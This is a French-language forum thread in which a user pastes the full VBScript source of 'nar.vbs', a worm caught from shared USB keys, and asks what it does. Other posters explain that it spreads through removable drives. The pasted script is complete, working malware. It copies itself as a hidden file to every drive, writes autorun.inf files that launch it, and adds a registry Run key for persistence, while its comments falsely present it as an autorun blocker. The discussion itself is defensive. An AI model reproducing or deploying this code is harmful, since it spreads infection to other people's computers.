[Wes Barfog]

Bonsoir !

On s'est tous chopés, aux cours du soir, a force de se passer nos clés usb, un petit fichier "nar.vbs"... Une fois qu'on branche une clé infectée, on ne peux plus l'ouvrir depuis le poste de travail par un double clique : windows demande avec quoi je veux ouvrir mon volume k:

Enfin soit, cette saloperie installe un fichier caché "nar.vbs" a la racine du disque, et dans le repertoire de windows. Il ajoute une entrée dans la base des registres ( HKLM/sotftware/microsoft/currentversion/run ) pour s'éxecuter au démarrage

Mais ce qui est étrange, c'est qu'en regardant ce qu'il ya dans ce fichier, et bien ca ne ressemble pas vraiment a un virus ... En plus c'est commenté Oo

Code:

'--------------------------------------------------------------->
'---Disables Autorun to prevent the spread of malicious code.--->
'---v0.1-------------------------------------------------------->
'--------------------------------------------------------------->
on error resume next

dim narsource,nar_RunDir,windir,disk_Drive,fso,mf,autorun,to_File,text,shell,in_WinDir,wsh_Path

set fso = CreateObject("Scripting.FileSystemObject")
set shell = CreateObject("Wscript.shell")
set mf = fso.GetFile(Wscript.ScriptFullname)
nar_RunDir = fso.GetParentFolderName(mf)
Set windir = fso.getspecialfolder(0)
in_WinDir = 2
wsh_Path = fso.GetFile(Wscript.Fullname)


'---Open the drive just like autorun would if it is not running from the windows directory--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
  shell.run(windir & "\explorer.exe /root," & nar_RunDir)
  in_WinDir = 0
Else
  in_WinDir = 1
End If

'---If file is in windir and not running from windir then write the registry run value and exit--->
If (fso.FileExists(windir & "\nar.vbs") = 0 or in_WinDir = 1) Then

autorun = "[autorun]"&vbcrlf&"shellexecute=wscript.exe nar.vbs"
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
narsource=narsource & text.readline
narsource=narsource & vbcrlf
loop


If (in_WinDir = 0) Then
  set to_File = fso.getfile(windir & "\Nar.vbs")
  to_File.attributes = 32
  set to_File=fso.createtextfile(windir & "\Nar.vbs",2,true)
  to_File.write narsource
  to_File.close
  set to_File = fso.getfile(windir & "\Nar.vbs")
  to_File.attributes = 39
End If

do while (in_WinDir = 1)
'---Add nar and autorun to each local disk drive excluding floppies--->
for each disk_Drive in fso.drives
  If (disk_Drive.drivetype = 1 or disk_Drive.drivetype = 2) Then
    
    set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
    to_File.attributes = 32
    set to_File=fso.CreateTextFile(disk_Drive.path & "\nar.vbs",2,true)
    to_File.write narsource
    to_File.close
    set to_File=fso.GetFile(disk_Drive.path & "\nar.vbs")
    to_File.attributes = 39

    set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
    to_File.attributes = 32
    set to_File=fso.CreateTextFile(disk_Drive.path & "\Autorun.inf",2,true)
    to_File.write autorun
    to_File.close
    set to_File=fso.GetFile(disk_Drive.path & "\Autorun.inf")
    to_File.attributes = 39
  End If
next

'---Edit the registry to disable autorun--->
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"
shell.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom\AutoRun",0,"REG_DWORD"
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveTypeAutoRun",255,"REG_DWORD"
shell.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
shell.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"
shell.regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveAutoRun",67108863,"REG_DWORD"

'---Run once every 5 minutes while within the Windows directory--->
wscript.sleep(60000)
loop

'---Run the instance in the windows directory so a thumb drive is not stuck in use and the process continues--->
If (fso.GetAbsolutePathName(windir) <> fso.GetAbsolutePathName(nar_RunDir)) Then
  temp = windir&"\nar.vbs"
  shell.run temp,1,0
End If
End If
shell.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\nar",windir&"\nar.vbs","REG_SZ"

Etant pas doué en scripting visual basic, si quelqu'un pourrait me décrire brièvement ce que ca fait, je lui en serait reconnaissant

[Antipika]

Pas besoin d'être un expert pour voir qu'il s'agit d'un virus :<

Les commentaires ma fois je ne sais pas pourquoi les avoir laisser dedans, mais bon c'est pas la première fois que l'on rencontre un virus de ce type commenté :]

[Wes Barfog]

Ouais c'est sur, un truc qui viens s'installer agressivement comme ca, moi je le vire

Mais quelqu'un peut me dire ce que ca fait, grosso modo ?

[Alaster The Mad]

pour le désactiver, j'crois que tu as un autorun.inf en fichier caché à la racine de ta clé à virer.

[Antipika]

Citation :

Publié par Wes Barfog

Mais quelqu'un peut me dire ce que ca fait, grosso modo ?

Hormis faire chier le monde en proliférant via tous les médias non fixe (clé USB en particulier), je ne vois pas :<

[S!ng Mary]

Il s'agit d'un ver qui se propage par supports amovibles. Dès que tu double cliques sur un support amovible dans ton lecteur, ça (re)lançait ce script vbs, donc l'infection, via des autorun.inf (infectieux).

L'infection se propage ensuite sur tes autres lecteurs amovibles ou pas.

[Wes Barfog]

En gros cette saloperie se réplique partout mais ca fait rien d'autre ... ?

[adorya]

En général il est couplé avec d'autres fichiers cachés divers (dll, exe, etc...) qui sont aussi copiés pendant que le vbs s'active lors du plug de ta clé. C'est une sorte de passe partout pour faire transiter des virus/trojans un peu plus méchants, mais apparemment celui qui t'a originellement filé ça à du les virer sans s'en rendre compte tout en laissant celui là.